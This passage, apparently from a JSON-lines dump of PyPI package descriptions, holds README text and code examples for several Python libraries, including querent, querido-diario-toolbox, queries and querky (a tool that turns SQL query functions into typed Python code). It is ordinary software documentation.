needed.Collecting Data:Implement collector classes to gather data from chosen sources. Handle errors and edge cases gracefully.Processing Data:Create ingestors and processors to clean, transform, and filter collected data. Apply custom logic to meet your requirements.Storage:Choose your storage system (e.g., databases) and configure connections. Store processed data efficiently.Task Orchestration:For large tasks, implement a task orchestrator to manage and distribute the workload.Scaling:To handle scalability, consider running multiple instances of collectors and ingestors in parallel.Monitoring:Implement monitoring and logging to track task progress, detect errors, and ensure smooth operation.Documentation:Maintain thorough project documentation to make it easy for others (and yourself) to understand and contribute.ConfigurationQuerent relies on configuration files to define how collectors, ingestors, and processors operate. These files are typically located in theconfigdirectory. 
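The configuration can also be assembled directly in code, which is the style the full workflow example further below uses; here is a minimal sketch of that, reusing the same classes (the directory path is a placeholder):

import uuid
from pathlib import Path

from querent.collectors.collector_resolver import CollectorResolver
from querent.common.uri import Uri
from querent.config.collector.collector_config import FSCollectorConfig

# Point a file-system collector at a local directory of documents.
directory_path = "./data/documents"
collector = CollectorResolver().resolve(
    Uri("file://" + str(Path(directory_path).resolve())),
    FSCollectorConfig(root_path=directory_path, id=str(uuid.uuid4())),
)
# Inside the async workflow the collector is then opened with: await collector.connect()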
Ensure that you configure the components according to your project's requirements.Querent: an asynchronous engine for LLMsSequence Diagram:Asynchronous Data Processing in QuerentsequenceDiagram\n participant User\n participant Collector\n participant Ingestor\n participant Processor\n participant LLM\n participant Querent\n participant Storage\n participant Callback\n\n User->>Collector: Initiate Data Collection\n Collector->>Ingestor: Collect Data\n Ingestor->>Processor: Ingest Data\n Processor->>LLM: Process Data (IngestedTokens)\n LLM->>Processor: Processed Data (EventState)\n Processor->>Storage: Store Processed Data (CollectedBytes)\n Ingestor->>Querent: Send Ingested Data (IngestedTokens)\n Querent->>Processor: Process Ingested Data (IngestedTokens)\n Processor->>LLM: Process Data (IngestedTokens)\n LLM->>Processor: Processed Data (EventState)\n Callback->>Storage: Store Processed Data (EventState)\n Querent->>Processor: Processed Data Available (EventState)\n Processor->>Callback: Return Processed Data (EventState)\n Callback->>User: Deliver Processed Data (CollectedBytes)\n\n Note right of User: Asynchronous Flow\n Note right of Collector: Data Collection\n Note right of Ingestor: Data Ingestion\n Note right of Processor: Data Processing\n Note right of LLM: Language Model Processing\n Note right of Querent: Query Execution\n Note right of Storage: Data Storage\n Note right of Callback: Callback InvocationEase of UseWith Querent, creating scalable workflows with any LLM is just a few lines of code.importpytestimportuuidfrompathlibimportPathimportasynciofromquerent.callback.event_callback_interfaceimportEventCallbackInterfacefromquerent.common.types.ingested_tokensimportIngestedTokensfromquerent.common.types.ingested_codeimportIngestedCodefromquerent.common.types.ingested_imagesimportIngestedImagesfromquerent.common.types.ingested_messagesimportIngestedMessagesfromquerent.common.types.querent_eventimportEventState,EventTypefromquerent.common.types.querent_queueimportQuerentQueuefromquerent.core.base_engineimportBaseEnginefromquerent.querent.querentimportQuerentfromquerent.querent.resource_managerimportResourceManagerfromquerent.collectors.collector_resolverimportCollectorResolverfromquerent.common.uriimportUrifromquerent.config.collector.collector_configimportFSCollectorConfigfromquerent.ingestors.ingestor_managerimportIngestorFactoryManager# Create input and output queuesinput_queue=QuerentQueue()resource_manager=ResourceManager()# Define a simple mock LLM engine for testingclassMockLLMEngine(BaseEngine):def__init__(self,input_queue:QuerentQueue):super().__init__(input_queue)asyncdefprocess_tokens(self,data:IngestedTokens):ifdataisNoneordata.is_error():# the LLM developer can raise an error here or do something else# the developers of Querent can customize the behavior of Querent# to handle the error in a way that is appropriate for the use caseself.set_termination_event()return# Set the state of the LLM# At any given point during the execution of the LLM, the LLM developer# can set the state of the LLM using the set_state method# The state of the LLM is stored in the state attribute of the LLM# The state of the LLM is published to subscribers of the 
LLMcurrent_state=EventState(EventType.Graph,1.0,\"anything\",\"dummy.txt\")awaitself.set_state(new_state=current_state)asyncdefprocess_code(self,data:IngestedCode):passasyncdefprocess_messages(self,data:IngestedMessages):returnsuper().process_messages(data)asyncdefprocess_images(self,data:IngestedImages):returnsuper().process_images(data)defvalidate(self):returnTrue@pytest.mark.asyncioasyncdeftest_example_workflow_with_querent():# Initialize some collectors to collect the datadirectory_path=\"./tests/data/pdf4\"collectors=[CollectorResolver().resolve(Uri(\"file://\"+str(Path(directory_path).resolve())),FSCollectorConfig(root_path=directory_path,id=str(uuid.uuid4())),)]# Connect to the collectorforcollectorincollectors:awaitcollector.connect()# Set up the result queueresult_queue=asyncio.Queue()# Create the IngestorFactoryManageringestor_factory_manager=IngestorFactoryManager(collectors=collectors,result_queue=result_queue)# Start the ingest_all_async in a separate taskingest_task=asyncio.create_task(ingestor_factory_manager.ingest_all_async())### A Typical Use Case #### Create an engine to harness the LLMllm_mocker=MockLLMEngine(input_queue)# Define a callback function to subscribe to state changesclassStateChangeCallback(EventCallbackInterface):asyncdefhandle_event(self,event_type:EventType,event_state:EventState):print(f\"New state:{event_state}\")print(f\"New state type:{event_type}\")assertevent_state.event_type==EventType.Graph# Subscribe to state change events# This pattern is ideal as we can expose multiple events for each use case of the LLMllm_mocker.subscribe(EventType.Graph,StateChangeCallback())## one can also subscribe to other events, e.g. EventType.CHAT_COMPLETION ...# Create a Querent instance with a single MockLLM# here we see the simplicity of the Querent# massive complexity is hidden in the Querent,# while being highly configurable, extensible, and scalable# async architecture helps to scale to multiple querenters# How async architecture works:# 1. Querent starts a worker task for each querenter# 2. Querenter starts a worker task for each worker# 3. Each worker task runs in a loop, waiting for input data# 4. When input data is received, the worker task processes the data# 5. The worker task notifies subscribers of state changes# 6. The worker task repeats steps 3-5 until terminationquerent=Querent([llm_mocker],resource_manager=resource_manager,)# Start the querentquerent_task=asyncio.create_task(querent.start())awaitasyncio.gather(ingest_task,querent_task)if__name__==\"__main__\":asyncio.run(test_example_workflow_with_querent())ContributingContributions to Querent are welcome! 
Please follow ourcontribution guidelinesto get started.LicenseThis project is licensed under the BSL-1.1 License - see theLICENSEfile for details."} +{"package": "queri", "pacakge-description": "No description available on PyPI."} +{"package": "querido-diario-api-wrapper", "pacakge-description": "No description available on PyPI."} +{"package": "querido-diario-toolbox", "pacakge-description": "Portugu\u00eas (BR)|English (US)ToolboxDentro doecossistema do Querido Di\u00e1rio, este reposit\u00f3rio disponibiliza umabibliotecacom o ferramental para que a comunidade possa fazer suas pr\u00f3prias an\u00e1lises e manipula\u00e7\u00f5es com os recursos do projeto.A biblioteca oferece diferentes n\u00edveis de abstra\u00e7\u00f5es para trabalhar os dados, desde uma simples limpeza de texto at\u00e9 convers\u00e3o de diferentes formatos de arquivo para texto puro.Conhe\u00e7a mais sobre astecnologiase ahist\u00f3riado projeto nosite do Querido Di\u00e1rioSum\u00e1rioComo contribuirComo executarExemplos de usoSuporteAgradecimentosOpen Knowledge BrasilLicen\u00e7aComo contribuirAgradecemos por considerar contribuir com o Querido Di\u00e1rio! :tada:Voc\u00ea encontra como faz\u00ea-lo noCONTRIBUTING.md!Al\u00e9m disso, consulte adocumenta\u00e7\u00e3o do Querido Di\u00e1riopara te ajudar.Como executarPara utilizar aquerido-diario-toolbox\u00e9 necess\u00e1rio terPython(3.8+) instalado, al\u00e9m deTesseract OCR, os.jardeApache Tika(v1.24.1+) eTabula(v1.0.4+).Para instalar a bibliotecaquerido-diario-toolboxbasta abrir um terminal e executar o seguinte comando:$pipinstallquerido-diario-toolboxPara usar, importe a biblioteca em seu c\u00f3digo em Python.Exemplos de usoExemplos mais elaborados est\u00e3o dispon\u00edveis na pasta./examples. Voc\u00ea pode visualiz\u00e1-los (e interagir se desejar) utilizando notebooksJupyter.Removendo espa\u00e7os desnecess\u00e1rios em um textoIn[1]:fromquerido_diario_toolbox.process.text_processimportremove_breaksIn[2]:texto=\"\\n\\n\\nEste texto tem v\u00e1rios espa\u00e7os em branco\\n\\n\\ndesnecess\u00e1rios.\\n\"In[3]:remove_breaks(texto)Out[3]:'Este texto tem v\u00e1rios espa\u00e7os em branco desnecess\u00e1rios.'Encontrando CNPJs v\u00e1lidos em um textoIn[1]:fromquerido_diario_toolbox.process.edition_processimportextract_and_validate_cnpjIn[2]:texto=\"As empresas de CNPJ v\u00e1lidos 00.000.000/0001-91 e 00.360.305/0001-04 existem mas a de CNPJ 12.123.123/1234.12 n\u00e3o existe...\"In[3]:extract_and_validate_cnpj(texto)Out[3]:['00.000.000/0001-91','00.360.305/0001-04']Convertendo arquivo de formato fechado para texto puro e extraindo metadadosIn[1]:fromquerido_diario_toolboximportGazette...:fromquerido_diario_toolbox.etl.text_extractorimportcreate_text_extractorIn[2]:config={\"apache_tika_jar\":\"caminho/apache/tika/jar/tika-app-1.24.1.jar\"}...:extrator=create_text_extractor(config)In[3]:diario=Gazette(filepath=\"caminho/diario/fechado/diario.pdf\")In[4]:extrator.extract_text(diario)...:extrator.extract_metadata(diario)...:extrator.load_content(diario)Ap\u00f3s a execu\u00e7\u00e3o deextrator.load_content(diario), dois arquivos (um.txtcom o texto puro e um.jsoncom os metadados) ser\u00e3o criados.Saiba mais: Informa\u00e7\u00f5es completas da bibliotecaquerido-diario-toolboxacesse suadocumenta\u00e7\u00e3oSuporteIngresse em nossocanal de comunidadepara trocas sobre os projetos, d\u00favidas, pedidos de ajuda com contribui\u00e7\u00e3o e conversar sobre inova\u00e7\u00e3o c\u00edvica em geral.AgradecimentosEste projeto \u00e9 mantido pela Open Knowledge 
Brasil e poss\u00edvel gra\u00e7as \u00e0s comunidades t\u00e9cnicas, \u00e0sEmbaixadoras de Inova\u00e7\u00e3o C\u00edvica, \u00e0s pessoas volunt\u00e1rias e doadoras financeiras, al\u00e9m de universidades parceiras, empresas apoiadoras e financiadoras.Conhe\u00e7aquem apoia o Querido Di\u00e1rio.Open Knowledge BrasilAOpen Knowledge Brasil\u00e9 uma organiza\u00e7\u00e3o da sociedade civil sem fins lucrativos, cuja miss\u00e3o \u00e9 utilizar e desenvolver ferramentas c\u00edvicas, projetos, an\u00e1lises de pol\u00edticas p\u00fablicas, jornalismo de dados para promover o conhecimento livre nos diversos campos da sociedade.Todo o trabalho produzido pela OKBR est\u00e1 dispon\u00edvel livremente.Licen\u00e7aC\u00f3digo licenciado sob aLicen\u00e7a MIT."} +{"package": "querier", "pacakge-description": "A query language for data frames"} +{"package": "querierdd", "pacakge-description": "No description available on PyPI."} +{"package": "queries", "pacakge-description": "Queriesis a BSD licensed opinionated wrapper of thepsycopg2library for\ninteracting with PostgreSQL.The popularpsycopg2package is a full-featured python client. Unfortunately\nas a developer, you\u2019re often repeating the same steps to get started with your\napplications that use it. Queries aims to reduce the complexity of psycopg2\nwhile adding additional features to make writing PostgreSQL client applications\nboth fast and easy. Check out theUsagesection below to see how easy it can be.Key features include:Simplified APISupport of Python 2.7+ and 3.4+PyPy support viapsycopg2cffiAsynchronous support forTornadoConnection information provided by URIQuery results delivered as a generator based iteratorsAutomatically registered data-type support for UUIDs, Unicode and Unicode ArraysAbility to directly access psycopg2connectionandcursorobjectsInternal connection poolingDocumentationDocumentation is available athttps://queries.readthedocs.orgInstallationQueries is available viapypiand can be installed with easy_install or pip:pipinstallqueriesUsageQueries provides a session based API for interacting with PostgreSQL.\nSimply pass in theURIof the PostgreSQL server to connect to when creating\na session:session=queries.Session(\"postgresql://postgres@localhost:5432/postgres\")Queries built-in connection pooling will re-use connections when possible,\nlowering the overhead of connecting and reconnecting.When specifying a URI, if you omit the username and database name to connect\nwith, Queries will use the current OS username for both. You can also omit the\nURI when connecting to connect to localhost on port 5432 as the current OS user,\nconnecting to a database named for the current user. For example, if your\nusername isfredand you omit the URI when issuingqueries.querythe URI\nthat is constructed would bepostgresql://fred@localhost:5432/fred.If you\u2019d rather use individual values for the connection, the queries.uri()\nmethod provides a quick and easy way to create a URI to pass into the various\nmethods.>>>queries.uri(\"server-name\",5432,\"dbname\",\"user\",\"pass\")'postgresql://user:pass@server-name:5432/dbname'Environment VariablesCurrently Queries uses the following environment variables for tweaking various\nconfiguration values. The supported ones are:QUERIES_MAX_POOL_SIZE- Modify the maximum size of the connection pool (default: 1)Using the queries.Session classTo execute queries or call stored procedures, you start by creating an instance of thequeries.Sessionclass. 
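Putting two of the pieces above together before the Session examples that follow: the QUERIES_MAX_POOL_SIZE environment variable and the queries.uri() helper (host, database and credentials here are placeholders):

import os

import queries

# Raise the connection-pool ceiling from its default of 1 (see the
# QUERIES_MAX_POOL_SIZE note above).
os.environ["QUERIES_MAX_POOL_SIZE"] = "4"

# Build the connection URI from individual values instead of writing it by hand.
uri = queries.uri("db.example.com", 5432, "inventory", "app_user", "s3cr3t")

session = queries.Session(uri)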
It can act as a context manager, meaning you can\nuse it with thewithkeyword and it will take care of cleaning up after itself. For\nmore information on thewithkeyword and context managers, seePEP343.In addition to both thequeries.Session.queryandqueries.Session.callprocmethods that are similar to the simple API methods, thequeries.Sessionclass\nprovides access to the psycopg2 connection and cursor objects.Using queries.Session.queryThe following example shows how aqueries.Sessionobject can be used\nas a context manager to query the database table:>>>importpprint>>>importqueries>>>>>>withqueries.Session()assession:...forrowinsession.query('SELECT * FROM names'):...pprint.pprint(row)...{'id':1,'name':u'Jacob'}{'id':2,'name':u'Mason'}{'id':3,'name':u'Ethan'}Using queries.Session.callprocThis example usesqueries.Session.callprocto execute a stored\nprocedure and then pretty-prints the single row results as a dictionary:>>>importpprint>>>importqueries>>>withqueries.Session()assession:...results=session.callproc('chr',[65])...pprint.pprint(results.as_dict())...{'chr':u'A'}Asynchronous Queries with TornadoIn addition to providing a Pythonic, synchronous client API for PostgreSQL,\nQueries provides a very similar asynchronous API for use with Tornado.\nThe only major difference API difference betweenqueries.TornadoSessionandqueries.Sessionis theTornadoSession.queryandTornadoSession.callprocmethods return the entire result set instead of acting as an iterator over\nthe results. The following example usesTornadoSession.queryin an asynchronousTornadoweb application to send a JSON payload with the query result set.fromtornadoimportgen,ioloop,webimportqueriesclassMainHandler(web.RequestHandler):definitialize(self):self.session=queries.TornadoSession()@gen.coroutinedefget(self):results=yieldself.session.query('SELECT * FROM names')self.finish({'data':results.items()})results.free()application=web.Application([(r\"/\",MainHandler),])if__name__==\"__main__\":application.listen(8888)ioloop.IOLoop.instance().start()InspirationQueries is inspired byKenneth Reitz\u2019sawesome\nwork onrequests.HistoryQueries is a fork and enhancement ofpgsql_wrapper, which can be found in the\nmain GitHub repository of Queries as tags prior to version 1.2.0."} +{"package": "querify", "pacakge-description": "UNKNOWN"} +{"package": "querio", "pacakge-description": "Quer.ioDocumentation linksSeeDocumentationfor DocumentationSeeUsage guidefor a basic rundown on how to use Quer.ioSeeDatabase Schema 1for single table sample database schemaSeeDatabase Schema 2for normalized sample database schemaSeeML documentationfor documentation\non the machine learning modelProject descriptionThis project is built to the specifications and requirements provided by Prof. Michael Mathioudakis and is a course work project for course TKT20007 Software Engineering Lab at the University of Helsinki, department of Computer Science.The aim of this project is to build an Approximate Query Processing (AQP) engine -- i.e., a software layer on top of a relational database, that allows us to obtain fast, approximate answers to aggregate queries, with the help of Machine Learning models.Chosen implementation is a Python library that can be used with multiple different database systems. 
Machine learning components are built using Scikit Learn.InstallationThis project is done with Python 3.6SeeDatabase Installation guidefor information how to install the sample databases this application was tested on.SeeApplication Installation guidefor information how to install the application and all its dependencies.Optional installationSeeQuerio Schedulerfor how to install and use a scheduler for periodical model retraining.TestsCurrently the project contains tests that are done using theunittestlibrary. Tests can be run with the following command from the project rootpython3 -m unittest discoverThis command will find every test from the project and run it. If you want to run an individual test script it can be done with the following commandpython3 -m unittest [path to file]ContributorsDennis AhlforsJoonas JKim ToivonenMauri FrestadiusOssi R\u00e4is\u00e4Petja Valkama"} +{"package": "querius", "pacakge-description": "Querius ClientClient code for interacting with theQueriusAPI.InstallpipinstallqueriusUsagefromgoogle.cloudimportbigqueryfromqueriusimportQueriusClient,patch_bq_client_with_querius_clientfrompathlibimportPathbq_client=bigquery.Client()q_client=QueriusClient.from_service_account_path(api_url=\"\",service_account_path=Path('path/to/key.json'),customer_id=\"\",timeout_seconds=2)patch_bq_client_with_querius_client(bq_client,q_client)"} +{"package": "querky", "pacakge-description": "querkyTurn your SQL queries into type annotated Python functions and autogenerated types with a single decorator.ShowcaseThis example shows whatquerkySQL functions look like.Consider this PostgreSQL database schema:CREATETABLEaccount(idBIGSERIALPRIMARYKEY,usernameTEXTUNIQUENOTNULL,first_nameTEXTNOTNULL,last_nameTEXT,phone_numberTEXT,balanceBIGINTNOTNULLDEFAULT0,join_tsTIMESTAMPTZNOTNULLDEFAULTNOW(),referred_by_account_idBIGINTREFERENCESaccount(id));CREATETABLEpost(idBIGSERIALPRIMARYKEY,poster_idBIGINTNOTNULLREFERENCESaccount(id),messageTEXTNOTNULL,tsTIMESTAMPTZNOTNULLDEFAULTNOW());CREATETABLEpost_comment(idBIGSERIALPRIMARYKEY,post_idBIGINTNOTNULLREFERENCESpost(id),commenter_idBIGINTNOTNULLREFERENCESaccount(id),messageTEXTNOTNULL,tsTIMESTAMPTZNOTNULLDEFAULTNOW());And these are the queries defined on it:fromquerky_defimportqrk# an UPDATE query: no value returned@qrk.query# or @qrk.query(shape='status')defupdate_account_phone_number(account_id,new_phone_number):returnf'''UPDATEaccountSETphone_number ={+new_phone_number}WHEREid ={+account_id}'''# an INSERT query to always return a single value@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name,phone_number,balance,referred_by_account_id):returnf'''INSERT INTOaccount(username,first_name,last_name,phone_number,balance,referred_by_account_id)VALUES({+username},{+first_name},{+last_name},{+phone_number},{+balance},{+referred_by_account_id})RETURNINGid'''# a SELECT query to return an array of single values@qrk.query(shape='column')defselect_top_largest_balances(limit):returnf'''SELECTbalanceFROMaccountORDER BYbalance DESCLIMIT{+limit}'''# now for the most interesting part: fetching rows# a SELECT query to return a single (one) AccountReferrer row or None (optional)@qrk.query('AccountReferrer',shape='one',optional=True)defget_account_referrer(account_id):returnf'''SELECTreferrer.id,referrer.username,referrer.first_name,referrer.last_name,referrer.join_tsFROMaccountINNER JOINaccount AS referrerONaccount.referred_by_account_id = referrer.idWHEREaccount.id ={+account_id}'''# a SELECT query to return many (an array of) 
AccountPostComment rows@qrk.query('AccountPostComment',shape='many')defselect_last_post_comments(post_id,limit):returnf'''SELECTaccount.first_name,account.last_name,post_comment.id,post_comment.messageFROMpost_commentINNER JOINaccountONpost_comment.commenter_id = account.idWHEREpost_comment.post_id ={+post_id}ORDER BYpost_comment.ts DESCLIMIT{+limit}'''So, as you can see, all you need is3 simple steps:Write a Python functionreturning the desired SQL query.Insert the argumentsexactly where you want them to be.Don't forget to prepend your arguments with a plus sign(+). Even though it is a regular Python format string,the resulting query is not SQL-injectable, as you'll later see.Add the@qrk.querydecoratorusing arguments to describe the expected shape and type of result set.Before you can use this code,you'll need theqrkobject.Bear with me, I'll show the full configuration in the next section, but, firstly, I would like to showthe results of runningquerky's code generator. Here it is:# ~ AUTOGENERATED BY QUERKY ~ #importdatetimefromasyncpgimportConnectionfromdataclassesimportdataclassfromsql.exampleimportupdate_account_phone_numberas_q0fromsql.exampleimportinsert_accountas_q1fromsql.exampleimportselect_top_largest_balancesas_q2fromsql.exampleimportget_account_referreras_q3fromsql.exampleimportselect_last_post_commentsas_q4asyncdefupdate_account_phone_number(__conn:Connection,/,account_id:int,new_phone_number:str)->str:returnawait_q0.execute(__conn,account_id,new_phone_number)asyncdefinsert_account(__conn:Connection,/,username:str,first_name:str,last_name:str,phone_number:str,balance:int,referred_by_account_id:int)->int:returnawait_q1.execute(__conn,username,first_name,last_name,phone_number,balance,referred_by_account_id)asyncdefselect_top_largest_balances(__conn:Connection,/,limit:int)->list[int]:returnawait_q2.execute(__conn,limit)@dataclass(slots=True)classAccountReferrer:id:intusername:strfirst_name:strlast_name:strjoin_ts:datetime.datetimeasyncdefget_account_referrer(__conn:Connection,/,account_id:int)->AccountReferrer|None:returnawait_q3.execute(__conn,account_id)_q3.bind_type(AccountReferrer)@dataclass(slots=True)classAccountPostComment:first_name:strlast_name:strid:intmessage:strasyncdefselect_last_post_comments(__conn:Connection,/,post_id:int,limit:int)->list[AccountPostComment]:returnawait_q4.execute(__conn,post_id,limit)_q4.bind_type(AccountPostComment)__all__=[\"select_last_post_comments\",\"AccountPostComment\",\"AccountReferrer\",\"insert_account\",\"update_account_phone_number\",\"get_account_referrer\",\"select_top_largest_balances\",]So, let's analyze what we got:We have all of our input and output types defined. The linter can now help us whenever we use any of these functions and types in our code.Whenever the database schema changes, the types and function arguments will accommodate automatically: just run the generation script again - and you're set.All the types were inferred from a live database connection, because your database is the single source of truth for your data, not the application.Our \"models\" are database rows. At last.Do not be discouraged, if you don't like using dataclasses in your projects, as this is just an example!So, if you like what you're seeing, let's configure your project!Basic ConfigurationasyncpgTo install, runpip install querky[asyncpg]Consider this project structure:src\n|__ querky_def.py\n|__ querky_gen.py\n|__ sql\n |__ example.pysqlfolder contains.pyfiles with the query functions. 
Generated code will be placed in thesql/queriesfolder under the same name as the inital script (example.pyin this case).querky_gen.pyfile is the code generation script. You run it when you want to regenerate the query functions:importasynciofromquerky.presets.asyncpgimportgeneratefromquerky_defimportqrkimportsqlfromenvimportCONNECTION_STRINGif__name__==\"__main__\":asyncio.run(generate(qrk,CONNECTION_STRING,base_modules=(sql,)))querky_def.pyis code generator configuration. We'll use a preset for the sake of simplicity.importosfromquerky.presets.asyncpgimportuse_presetqrk=use_preset(os.path.dirname(__file__),type_factory='dataclass+slots')The first argument should be the path to the root directory of your project.If you'd like more fine-grained control over theQuerkyobject, there will be an explaination in the later sections.After the configuration of theqrkobject it's time to run thequerky_gen.pyscript.Each of your queries will become type hinted, each of them will return a real Python object,\nand you can call these queries as regular Python functions.Every time you change your database schema or queries, you can now expect the changes to propagate throughout your code.\nBecause of that,refactoring SQL-dependent code has never been easier.This time the linter is on your side.Do not change the generated files, as they are transient and will be overwritten.\nIf you need to modify the generated code, consider usingon_before_func_code_emitandon_before_type_code_emithooks passed in to theQuerkyobject constructor.Type Hinting ExtensionsArgumentsOptionalsA careful reader might have noticed, that the generated argument types are never optional.\nIf we go back to the database schema, we will notice, that some of the columns areNULLABLE.\nAnd yet, ininsert_accountquery the respective arguments are notOptional.Why is that?Unfortunately, there is nostraightforwardway for the library to automate this process,\nbecause SQL-wise these are constraints, and not data types.So, it's our job to hint the library to do the right thing.Let's look at the signature of this function again:@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name,phone_number,balance,referred_by_account_id):...We know thatphone_number,last_nameandreferred_by_account_idare optional. 
So we just hint them like this:importtyping@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name:typing.Optional,phone_number:typing.Optional,balance,referred_by_account_id:typing.Optional):...Then, the generated function's signature will look like this:asyncdefinsert_account(__conn:Connection,/,username:str,first_name:str,last_name:str|None,phone_number:str|None,balance:int,referred_by_account_id:int|None)->int:...Default valuesLet's consider the sameinsert_accountquery.Let's makereferred_by_account_idNoneby default:@qrk.query(shape='value',optional=False)definsert_account(username,first_name,last_name:typing.Optional,phone_number:typing.Optional,balance,referred_by_account_id=None):...We'll get this signature:asyncdefinsert_account(__conn:Connection,/,username:str,first_name:str,last_name:str|None,phone_number:str|None,balance:int,referred_by_account_id:int|None=_q1.default.referred_by_account_id)->int:..._q1is a reference to the originalinsert_accountQueryobject, which contains the default value for this argument.This way any kind of default argument can be used,\nsince the generated function always references the original value.Notice that we got rid oftyping.Optionalfromreferred_by_account_id's annotation,\nyet the generated signature is stillint | None.\nThis \"type-inference\" behavior holds only for theNonedefault value.Enforce typeSometimes even type inference from the database itself does not help.\nA prime example would be the infamouspostgres'ARRAY[]type.\nValues of this type can have an arbitrary number of dimensions.Postgres docs:The current implementation does not enforce the declared number of dimensions either. Arrays of a particular element type are all considered to be of the same type, regardless of size or number of dimensions. 
So, declaring the array size or number of dimensions in CREATE TABLE is simply documentation; it does not affect run-time behavior.But oftentimes we find ourselves with a well-known structure,\neven though the type itself is permissive (hello, Python!).Consider this query:@qrk.query(shape='value',optional=False)defare_2d_matrices_equal(m):returnf\"SELECT{+m}= ARRAY[[1,2,3], [1,2,3], [1,2,3]]::INTEGER[]\"It yields this signature:asyncdefare_2d_matrices_equal(__conn:Connection,/,m:list[int])->bool:...Now, let's enforce our knowledge, that this array is two-dimensional.The way we do it is by regular PEP484 annotations:@qrk.query(shape='value',optional=False)defare_2d_matrices_equal2(m:'list[list[int]]'):returnf\"SELECT{+m}= ARRAY[[1,2,3], [1,2,3], [1,2,3]]::INTEGER[]\"And get this in return:asyncdefare_2d_matrices_equal2(__conn:Connection,/,m:list[list[int]])->bool:...Overriding annotations must always be strings.This is because they are literally copied from the source file into the generated one by using function annotation introspection.\nIf they were objects, this wouldn't be reliable.Return typesThe same problems apply to fields of a row.They, same as arguments, can be optional, can have a different type from the inferred one.For example, let's pimp theget_account_referrerquery, sincelast_nameis nullable.To do that, we need to import theattrobject:fromquerkyimportattr@qrk.query('AccountReferrer',shape='one',optional=True)defget_account_referrer(account_id):returnf'''SELECTreferrer.id,referrer.username,referrer.first_name,referrer.last_name AS{attr.last_name(optional=True)},referrer.join_tsFROMaccountINNER JOINaccount AS referrerONaccount.referred_by_account_id = referrer.idWHEREaccount.id ={+account_id}'''The generated type will now look like this:@dataclass(slots=True)classAccountReferrer:id:intusername:strfirst_name:strlast_name:str|Nonejoin_ts:datetime.datetimeNotice, howlast_nameis now optional.You can also use-attr.last_namesyntax for optional fields.To override the generated annotation use this syntax:@qrk.query(shape='one')defget_row():returnf'''SELECTARRAY[[1,2,3], [1,2,3], [1,2,3]]::INTEGER[] AS{attr.matrix2d('list[list[int]]')},ARRAY[[[1,2,3],[1,2,3]], [[1,2,3],[1,2,3]], [[1,2,3],[1,2,3]]]::INTEGER[] AS{attr.matrix3d('list[list[list[int]]]')},'Looks like text' AS{attr.definitely_not_text('float')}'''Generates this:@dataclass(slots=True)classSimpleRow:matrix2d:list[list[int]]matrix3d:list[list[list[int]]]definitely_not_text:floatThis looks a bit like magic, but here is how it works:attrobject is a singleton, which records each__getattr__invocation, returning anAttrobject in its stead.\nWhen theAttrobject is called, it records the arguments, and returns a string with which the__getattr__was invoked.\nOnce the code inside@qrk.querydecorated function is run,\nit flushes all the recordedAttrobjects into the query. 
Then, when the code is being generated,\nthose objects serve to complete the type information about their respective fields.Different queries - same return typeSometimes there is a couple of different ways to get to the same data.Consider these queries:@qrk.query('AccountInfo',shape='one')defget_account(account_id):returnf'''SELECTfirst_name,last_name,username,phone_numberFROMaccountWHEREid ={+account_id}'''@qrk.query('???',shape='one')defget_last_joined_account():returnf'''SELECTfirst_name,last_name,username,phone_numberFROMaccountORDER BYjoin_ts DESCLIMIT1'''What do we call the second type to not clash with the first one?AccountInfo2?It can be done this way, however this would potentially\nlead to many weirdly named duplicate types across the project.Instead, just pass in theget_accountquery in place of the first parameter:@qrk.query(get_account,shape='one')defget_last_joined_account():...This way the type won't be generated the second time,\nand the code will use the \"parent type\" in runtime.You can use queries from other modules, too. Just import them and use as shown,\nandquerkywill infer the required imports and place them in the generated file.Query reuseSincequerkyqueries are simple f-strings, there is no limit to combining them together via CTEs or\nsimply replacing a part of your query with another one.You can use subqueries as arguments to the main query with this technique:fromquerkyimportsubquery@qrk.query(shape='value',optional=False)defadd(a,b):returnf\"SELECT{+a}::INTEGER +{+b}\"@qrk.query(shape='value',optional=False)defmultiply(a,b):returnf\"SELECT{+a}::INTEGER *{+b}\"@qrk.query(shape='value',optional=False)defdivide(a,b):returnf\"SELECT{+a}::INTEGER /{+b}\"@qrk.query(shape='value',optional=False)defoperation(a,b):@subquerydefadd_ab():returnadd.query(a,b)@subquerydefmult_ab():returnmultiply.query(a,b)returndivide.query(add_ab,mult_ab)The resulting SQL will be:SELECT(SELECT$1::INTEGER+$2)::INTEGER/(SELECT$1::INTEGER*$2)We use::INTEGERcast to explicitly tell the database that in this query we work with integers.\nOtherwise, query \"compilation\" will fail, because+,-and/operators exist for many types,\nso there is no definitive way for the DBMS to infer what we meant.If it's not enough for you, you can generate SQL by joining strings,\nthe universal oldest method of how the ancients did it.\nOr use another library for this particular task.Just remember thatthe decorated function actually runs only onceto generate the SQL query.\nAt runtimequerkyalways uses that SQL query, never rerunning the function again.\nExcept, of course, for explicitQuery#query(...)calls, but these don't changeQuerystate in any way.If you need query folding capabilities, e.g.INSERTa variable number of rows with a single query,\nbe sure to look into thequerky.tools.query_foldermodule.How it WorksTheQuerkyclassIt is the class to configure how the library will talk to the database and provide code generator configurations.Let's go over constructor's arguments one by one:basedirThe absolute path to the base directory of your project.This path serves as an anchor, so that the generated files are placed properly.annotation_generatorIt's an instance ofAnnotationGeneratorsubclass, which, well, generates annotations both for arguments and for return types,\nbased onTypeKnowledgecollected.It's safe to use theClassicAnnotationGeneratorfor every use-case here.contractThis is an instance ofContractsubclass. 
ThisContractis betweenquerkyand your database driver of choice.TheContractdescribes a common interface forquerkyto talk to the database, execute your queries and infer the types.conn_param_configThis directive tellsquerkywhere you want to place your database connection argument for every generated function.Available subclasses:FirstandLast.type_factoryThis function createsoneandmanyqueries' return types. The currently implemented types are underquerky/type_constructors.TypedDictConstructor- generates a subclass oftyping.TypedDict. It's a regular dictionary with linter support.DataclassConstructor- generates a class decorated with@dataclasses.dataclass(...). Any additional**kwargspassed toDataclassConstructor's constructor will be reflected in the decorator. E.g.kw_only=True,slots=True.EveryTypeConstructorhas arow_factoryargument, which should be provided in case your database driver does not return the expected type.Therow_factoryis simply a converter from whatever the database driver returns to the type you need.In this example, we convert nativeasyncpg'sRecordobjects to Pythondataclasses.It is up to the user to implementrow_factory.subdirName of the subdirectory, where all the generated files will go.E.g., consider this project layout:payment_service\n|__ payments.py\n|__ withdrawals.py\n|__ __init__.py\ndelivery_service\n|__ deliveries.py\n|__ products.py\n|__ __init__.pyConsidering every.pyfile has queries andsubdir=\"queries\",\nwe're going to end up with the following 